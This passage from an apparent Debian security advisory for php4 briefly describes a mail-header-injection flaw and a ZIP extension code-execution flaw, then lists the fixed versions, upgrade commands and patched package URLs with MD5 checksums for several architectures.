\n\nCVE-2007-1718\n Stefan Esser discovered that the mail() function performs\n insufficient validation of folded mail headers, which allows mail\n header injection.\n\nCVE-2007-1777\n Stefan Esser discovered that the extension to handle ZIP archives\n performs insufficient length checks, which allows the execution of\n arbitrary code.\n\nFor the oldstable distribution (sarge) these problems have been fixed in\nversion 4.3.10-20.\n\nFor the stable distribution (etch) these problems have been fixed\nin version 4.4.4-8+etch2.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4.4.6-1. php4 will be removed from sid; thus you are strongly\nadvised to migrate to php5 if you prefer to follow the unstable\ndistribution.\n\nWe recommend that you upgrade your PHP packages. Packages for the arm,\nm68k and mipsen architectures are not yet available. They will be\nprovided later.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-20.dsc\n Size/MD5 checksum: 1686 01afd17e8897a2ef890c00ab7946f4a6\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-20.diff.gz\n Size/MD5 checksum: 530810 0cd90e33b3c9b935e2a70ccb52c00b31\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10.orig.tar.gz\n Size/MD5 checksum: 4892209 73f5d1f42e34efa534a09c6091b5a21e\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/p/php4/php4-pear_4.3.10-20_all.deb\n Size/MD5 checksum: 249996 044f2497171ee49cb5e8ad9e72c9ebcf\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-20_all.deb\n Size/MD5 checksum: 1140 a6884d893fc7798b47cd32601d71351c\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-20_alpha.deb\n Size/MD5 checksum: 1701574 8a139d9e3e8c1570ae49f3c78c933dd0\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-20_alpha.deb\n Size/MD5 checksum: 1699008 878413e740d5e5a48a1d15198290962c\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-20_alpha.deb\n Size/MD5 checksum: 3466160 cd6100331fd994559b4a3bae498679b5\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-20_alpha.deb\n Size/MD5 checksum: 1743734 bbc30d1750d4401acee705a835de15cd\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-20_alpha.deb\n Size/MD5 checksum: 168528 449ff53d83073cd6269bf3405ba8e691\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-20_alpha.deb\n Size/MD5 checksum: 18134 e7c509c845627791dc4b07174576f6ba\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-20_alpha.deb\n Size/MD5 checksum: 328142 2f464c465adaaed4c3e41134e7d3ff57\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-20_alpha.deb\n Size/MD5 checksum: 39032 53d45deb4ba6813488935a2f662eb84c\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-20_alpha.deb\n Size/MD5 checksum: 34542 f1d4d0bf8a30f0e15ea087d37bc579fe\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-20_alpha.deb\n Size/MD5 checksum: 38140 a2654d2984e24cd20a6d8e4d51df4121\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-20_alpha.deb\n Size/MD5 checksum: 21352 b58d4de563ec32203aaf36622853f200\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-20_alpha.deb\n Size/MD5 checksum: 18194 f8a53f27c1bdc205d80bc1b81724e74b\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-20_alpha.deb\n Size/MD5 checksum: 8322 816d58ebba1e57ab0afcbc6e832c8544\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-20_alpha.deb\n Size/MD5 checksum: 22442 34a63ca6fe1b1b7e540cce4da5c11950\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-20_alpha.deb\n Size/MD5 checksum: 28362 60254ad74e84382b40914efa1f75cb53\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-20_alpha.deb\n Size/MD5 checksum: 7952 fee7a4ac8b77f688f3af64cfc23b3f0c\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-20_alpha.deb\n Size/MD5 checksum: 13756 25537bf4449a66ea2f36ef907d461dbd\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-20_alpha.deb\n Size/MD5 checksum: 23286 1c4ddb18ba8eb13edc81c794a99dc57e\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-20_alpha.deb\n Size/MD5 checksum: 17876 6046e408886ab0f6c9c422c17d4c3287\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-20_amd64.deb\n Size/MD5 checksum: 1660908 7a8ff6fba827d2de5566ac7fa8bfc806\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-20_amd64.deb\n Size/MD5 checksum: 1658276 0f4865b7f6e45d3bb435329ee7817a7c\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-20_amd64.deb\n Size/MD5 checksum: 3278782 9b569958e513f5d48f3534a5fa4fd29b\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-20_amd64.deb\n Size/MD5 checksum: 1648702 3621f70121e9157435ccb5f4b293ed68\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-20_amd64.deb\n Size/MD5 checksum: 168650 0aee210a86f24d0f6afd978825c1170e\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-20_amd64.deb\n Size/MD5 checksum: 17832 1af59206ff4a5b5063c8b126e9103730\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-20_amd64.deb\n Size/MD5 checksum: 325248 5d25ba11ee3e4d7b33b5dcc64b448034\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-20_amd64.deb\n Size/MD5 checksum: 40800 2354c4ee096cbacc33e52bfc64982c6c\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-20_amd64.deb\n Size/MD5 checksum: 34286 1daae445aab198b9238c84eaa49b38f4\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-20_amd64.deb\n Size/MD5 checksum: 37728 c5e74affd328430d984d8882876cea09\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-20_amd64.deb\n Size/MD5 checksum: 21424 1169d7f2461a3303b55c104316e52868\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-20_amd64.deb\n Size/MD5 checksum: 18884 511f6a390fd4e08fd2070c7b34265c09\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-20_amd64.deb\n Size/MD5 checksum: 8256 8e787b1293f1fa0628fbea863a4870d9\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-20_amd64.deb\n Size/MD5 checksum: 22898 ebd956ac44e3b1b67f64a32dbef3bf65\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-20_amd64.deb\n Size/MD5 checksum: 28786 0862ef93f20a92adf8245be10e7383b9\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-20_amd64.deb\n Size/MD5 checksum: 7916 fbad29ff64367c7299adc1e424ae041d\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-20_amd64.deb\n Size/MD5 checksum: 13682 b1f05e358420f2fb9296c03217e8d997\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-20_amd64.deb\n Size/MD5 checksum: 22444 c061d9ecd1dda489dc33ba4c513c07b6\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-20_amd64.deb\n Size/MD5 checksum: 17580 3e29d981c5fa550b9fb4843f2bf37961\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-20_hppa.deb\n Size/MD5 checksum: 1759972 fe18ccfa8e6e637fe22b0b5a54edca11\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-20_hppa.deb\n Size/MD5 checksum: 1757642 915e2d5feb6262c7fdf0676226089921\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-20_hppa.deb\n Size/MD5 checksum: 3428498 73a6c1d3751cab7fc112ed0c8e9266bf\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-20_hppa.deb\n Size/MD5 checksum: 1720162 e1218480d59b977dbfcfe050f4a784f2\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-20_hppa.deb\n Size/MD5 checksum: 168646 5bbce13030fce736e54e771d63c240aa\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-20_hppa.deb\n Size/MD5 checksum: 20028 a2c59bfe7636adc0e676d68789d42278\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-20_hppa.deb\n Size/MD5 checksum: 325336 e809201a589ca3bf03e469b59eda33d4\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-20_hppa.deb\n Size/MD5 checksum: 42094 7f5db63d627ed91832b42df818eb9938\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-20_hppa.deb\n Size/MD5 checksum: 37334 dc3f0b9aff2f01664514a809d4b58982\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-20_hppa.deb\n Size/MD5 checksum: 42640 9f7f800acaa92129a280bd2e03e751ca\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-20_hppa.deb\n Size/MD5 checksum: 23004 ea9e086b5f0070c721bbb1bed2e7e4c4\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-20_hppa.deb\n Size/MD5 checksum: 19908 86f0c656b4d3d7ea3457e4c99ae64fd7\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-20_hppa.deb\n Size/MD5 checksum: 8696 4e0746b2377cda27da0fe982072d6912\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-20_hppa.deb\n Size/MD5 checksum: 23604 f2ce97f8fc4f4e1054900249c323bd37\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-20_hppa.deb\n Size/MD5 checksum: 30168 0f8ac3bffd8d3a4758679affefdc242f\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-20_hppa.deb\n Size/MD5 checksum: 8338 0badc81e5f67a901811aa342ca72e467\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-20_hppa.deb\n Size/MD5 checksum: 14568 5cca84a80e89f30897044c5742fb0d5f\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-20_hppa.deb\n Size/MD5 checksum: 24136 2432e9e4221d11dd9acb2250865ea0f9\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-20_hppa.deb\n Size/MD5 checksum: 18662 acd9f2e6cb79977c85b12c9008a3ca83\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-20_i386.deb\n Size/MD5 checksum: 1614290 0788c4bf41dee1f9cac03ef7536d7468\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-20_i386.deb\n Size/MD5 checksum: 1612106 519f180dddbb4e625c31541e7d043aaa\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-20_i386.deb\n Size/MD5 checksum: 3209678 2e4481e12f311f835a8f77161922e087\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-20_i386.deb\n Size/MD5 checksum: 1609694 5321cb8b52491099bbe3d7602df8500e\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-20_i386.deb\n Size/MD5 checksum: 168646 a70cf71baca4b197ba846b20926ec90a\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-20_i386.deb\n Size/MD5 checksum: 17896 64c56e2e2bcb4ba34652ab4638c64ece\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-20_i386.deb\n Size/MD5 checksum: 325172 2c32c61bb1c731518b39d645c09ffc72\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-20_i386.deb\n Size/MD5 checksum: 37234 33ba55c445cbb037d599c4409840494a\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-20_i386.deb\n Size/MD5 checksum: 32390 2b24494070d5041e13095442cb3dd2f9\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-20_i386.deb\n Size/MD5 checksum: 37404 d312b15f47de9f7521439203085af0aa\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-20_i386.deb\n Size/MD5 checksum: 19956 b113e121c9bf8984f6217e3d88991fb4\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-20_i386.deb\n Size/MD5 checksum: 17680 ca34f5559bf2aad0eab530168eefdc86\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-20_i386.deb\n Size/MD5 checksum: 8034 e91216b621640a5df9ad47757b54f0ed\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-20_i386.deb\n Size/MD5 checksum: 21212 3cac7bcfe64475759d6b50cb6dddbc05\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-20_i386.deb\n Size/MD5 checksum: 27142 74e421f406597033ad808a2e9553436b\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-20_i386.deb\n Size/MD5 checksum: 7700 867b4b6e92180463b56c066b97b9d21f\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-20_i386.deb\n Size/MD5 checksum: 13150 e6bcc87e86606fbcab7c2a661752808e\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-20_i386.deb\n Size/MD5 checksum: 21376 e6eb33691768a6f9511d44e6f0095a76\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-20_i386.deb\n Size/MD5 checksum: 16396 18212307871b1b99ad053037c90d45c1\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-20_ia64.deb\n Size/MD5 checksum: 1952456 2b9c6b45a2ae5a76fb7a10f07d1a17a3\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-20_ia64.deb\n Size/MD5 checksum: 1949732 f43b4619aa334d15f8d9d797bb96dcd2\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-20_ia64.deb\n Size/MD5 checksum: 3896170 ba256af9eae452fc4b90f37590da9ffe\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-20_ia64.deb\n Size/MD5 checksum: 1950502 967527b2ff9333249bd0382ec75465b7\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-20_ia64.deb\n Size/MD5 checksum: 168632 1e37e184603e714e8c36778a72ab8093\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-20_ia64.deb\n Size/MD5 checksum: 22016 30dcdaee7f1b4e1a46c607d87b2bfad3\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-20_ia64.deb\n Size/MD5 checksum: 325164 068abbee40179a7be79836f0aea5524e\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-20_ia64.deb\n Size/MD5 checksum: 50628 61d7a4fda1ab9c7b831a4685e1a7758a\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-20_ia64.deb\n Size/MD5 checksum: 45246 5c4d436e2d2660d31d1b29a8ea53e592\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-20_ia64.deb\n Size/MD5 checksum: 48258 c14e319c5f83bdb6d6d0fec722ebdddd\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-20_ia64.deb\n Size/MD5 checksum: 27026 89fecab65c9cd6c51e51434f472075d8\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-20_ia64.deb\n Size/MD5 checksum: 22642 a68e51599d3e64356fb438c156052ae9\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-20_ia64.deb\n Size/MD5 checksum: 9320 99b2aed583960cf88086bb13627c9f70\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-20_ia64.deb\n Size/MD5 checksum: 27582 1474434c0d48815aa916848a3b51adae\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-20_ia64.deb\n Size/MD5 checksum: 36170 512eddcf0087b55d93d1f6909d803ab9\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-20_ia64.deb\n Size/MD5 checksum: 9004 7b97d0aba06f630e0ae2e4238b518739\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-20_ia64.deb\n Size/MD5 checksum: 16322 0769ca22c0da9d7940a183d0ee697401\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-20_ia64.deb\n Size/MD5 checksum: 28868 ba05371eb61f2c7a81da206c77f8aa05\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-20_ia64.deb\n Size/MD5 checksum: 21902 ecba9e7b555856b3882ef8034810bbf8\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 1661240 fa31cb71f7e04149bcd2fc47e6021f37\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 1659478 2f3a548e1b913867f139855318f62d49\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 3281292 e7d07eef06dde8e394b625d1c6b5284e\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 1646798 d9daffe2592a05a704a96b5692260fc3\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 168648 8b39d752cc59c50fa2b55cb0c61c01f1\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 19656 6e7b6254a6705a402f93a78cc75144ea\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 325242 69f08f523f5dbed3fb5b0b45df4fd607\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 38652 1811eabb765e3c7fbf2c25aa498998eb\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 34532 ede7704c6044690b451c9c540623facc\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 37784 2c6ba99eb4fe42fde92f02bc24ce2ac2\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 21426 fa1f59fd6877af67e9dde090ffd6ddf0\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 19740 5335e56d5e48b6760ced25607cc5c7d2\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 9590 12f7c4910fdab3aeb22823254ffce6d8\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 22614 3da3c144694b1c15a7df40187611b5c6\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 28702 972be4ee4fcf0413ba3d8970aa40ddd9\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 9290 7bc432256533e37e7dece2b39a865b3e\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 14966 ca56b39859ee5d3f49f0ab3db34d059d\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 23044 2905ba08e917282302061e05fc752a0d\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-20_powerpc.deb\n Size/MD5 checksum: 18282 91386433b2ce660bab7a780b004c9835\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-20_s390.deb\n Size/MD5 checksum: 1709632 94ccc0406c7d9c7d2631e58d93fdefc1\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-20_s390.deb\n Size/MD5 checksum: 1708826 7e993c3bbc08b5c82c41d789c7cfff58\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-20_s390.deb\n Size/MD5 checksum: 3360760 41816c5c1b2cd597237ffae7b455205c\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-20_s390.deb\n Size/MD5 checksum: 1687652 e80900af05c3bcfaad49dbe1290c4076\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-20_s390.deb\n Size/MD5 checksum: 168632 90110a74784e3aa501d1567bff94cee6\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-20_s390.deb\n Size/MD5 checksum: 17846 43e79532ed588cb16a6e632a40a350bf\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-20_s390.deb\n Size/MD5 checksum: 325196 47597383b28577081ca97e02b3cfb8e4\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-20_s390.deb\n Size/MD5 checksum: 41122 885a92dcb6ce4ebe55a32765e5a8038a\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-20_s390.deb\n Size/MD5 checksum: 33566 b64ec15561769f34f3f867e0afc03b65\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-20_s390.deb\n Size/MD5 checksum: 37528 3a432bd34bef45e11663751acd9b2e33\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-20_s390.deb\n Size/MD5 checksum: 21414 f76e2434bb8e8c2baac090f9b835f6bc\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-20_s390.deb\n Size/MD5 checksum: 17732 09a95e8595cc0afaec1387778d5387f1\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-20_s390.deb\n Size/MD5 checksum: 8396 a4fb0e0f9e6c2e8631a3cec7ec9d38df\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-20_s390.deb\n Size/MD5 checksum: 22932 7d0ab956dd491c6710897ad9e0647cd7\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-20_s390.deb\n Size/MD5 checksum: 28870 3ffe2bdae7e7fa819da4dc249b5a7120\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-20_s390.deb\n Size/MD5 checksum: 8040 8487494d6ebd1cdcbc84dd977efc410a\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-20_s390.deb\n Size/MD5 checksum: 13898 771ed21f8cf340607098638ba33e4d0a\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-20_s390.deb\n Size/MD5 checksum: 22274 0375c8cd0240eca1699bfb0525c0db17\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-20_s390.deb\n Size/MD5 checksum: 17300 822203879fac8c670831be8c2092dd5b\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-20_sparc.deb\n Size/MD5 checksum: 1623848 50fa63f837becf590ccdaca3358ed99f\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-20_sparc.deb\n Size/MD5 checksum: 1621098 c7c6553ad6fa8871172df3964ca8f510\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-20_sparc.deb\n Size/MD5 checksum: 3198024 b7daa2dcab4344f2b3f0275c7a84b6a2\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-20_sparc.deb\n Size/MD5 checksum: 1606504 9dbb49b77cb419b42710ee0eaf2a1d30\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-20_sparc.deb\n Size/MD5 checksum: 168654 3453e8f21481d63d568c9022f0a04033\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-20_sparc.deb\n Size/MD5 checksum: 18070 32502bd4cf9b2f2f453b9593a342fd1b\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-20_sparc.deb\n Size/MD5 checksum: 325272 2e66026b7d38e0bf6ed5899eaacd785f\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-20_sparc.deb\n Size/MD5 checksum: 36480 fbb50611ab3c3dd21d258c909b368c94\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-20_sparc.deb\n Size/MD5 checksum: 31934 de8e68622a9f453caba80a1d10fddc5d\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-20_sparc.deb\n Size/MD5 checksum: 36240 e20ef1458519d12b8395d6b511eaa2e5\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-20_sparc.deb\n Size/MD5 checksum: 19266 1f631576f766524ca172d72eab9a6f0f\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-20_sparc.deb\n Size/MD5 checksum: 17482 0652c9025d9031c82708924e3ddf222d\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-20_sparc.deb\n Size/MD5 checksum: 7868 9e5bf6c72dd0a363814d592fef7e2a5f\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-20_sparc.deb\n Size/MD5 checksum: 20666 cdf4fb39c82ce6856970fff2fe2e27b1\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-20_sparc.deb\n Size/MD5 checksum: 26530 8edcfab2ff4524905a8a650f089a0eab\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-20_sparc.deb\n Size/MD5 checksum: 7590 8f6e652518dcae290d375abfd37a3770\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-20_sparc.deb\n Size/MD5 checksum: 12838 7ff4cf6a7cb62f7b3118d9a977475eb6\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-20_sparc.deb\n Size/MD5 checksum: 20840 0ee9caaf31efd4eb3ca757cb5d8b4f36\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-20_sparc.deb\n Size/MD5 checksum: 15866 9f64556e750ad0d32b02e627206deb5f\n\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/p/php4/php4_4.4.4-8+etch2.dsc\n Size/MD5 checksum: 2002 ca94b91d80126bdc3c33590e0d1731dd\n http://security.debian.org/pool/updates/main/p/php4/php4_4.4.4-8+etch2.diff.gz\n Size/MD5 checksum: 200183 569f1889825be999cf57e1c5bd554753\n http://security.debian.org/pool/updates/main/p/php4/php4_4.4.4.orig.tar.gz\n Size/MD5 checksum: 5555168 e884b9b7c2e936310553c946bc2f67c2\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/p/php4/php4-pear_4.4.4-8+etch2_all.deb\n Size/MD5 checksum: 1176 0f7d6a3667c882abdef300ccd39203bf\n http://security.debian.org/pool/updates/main/p/php4/php4_4.4.4-8+etch2_all.deb\n Size/MD5 checksum: 1164 5655499d24b45300b60402032344620f\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 1685530 93cb53b59af568ca7942f7658f01fc61\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 1685672 05c506afc53419e715f3de84cb5053e1\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 3313094 f87d581bda2cd9648f7bf367e4562716\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 1663652 bcfa24d41ad9de0b3fc33546a148df37\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 204922 4f3455d24c121ca818ad2c2cdbfe992c\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 16072 31ab42e019250766b38e73801a0dc7f9\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 200806 957801d7c557ec4b89c652cdc5e13588\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 37696 7959070edf3ca03b214ab17c22cf72b0\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 32316 